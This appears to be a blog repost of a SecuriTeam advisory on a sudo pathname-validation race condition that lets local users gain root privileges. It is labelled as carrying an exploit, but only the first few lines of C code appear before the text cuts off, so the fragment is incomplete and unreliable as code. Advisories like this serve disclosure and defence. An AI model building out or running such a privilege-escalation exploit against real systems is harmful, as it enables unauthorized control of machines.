The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
sudo Pathname Validation Race Condition (Exploit)
------------------------------------------------------------------------
SUMMARY
sudo (superuser do) is "a program written for UNIX, Linux, and similar
operating systems that allows users to run programs in the guise of
another user (normally in the guise of the system's superuser)". A race
condition in sudo whenever it tries to validates file pathname allows
local attackers to gain elevated privileges.
DETAILS
Vulnerable Systems:
* OpenBSD sudo versions 1.3.1 - 1.6.8p
Exploit:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sysexits.h>
#include <sys/wait.h>
#define SUDO "/usr/bin/sudo"
#ifdef BUFSIZ
#undef BUFSIZ
#define BUFSIZ 128
No comments:
Post a Comment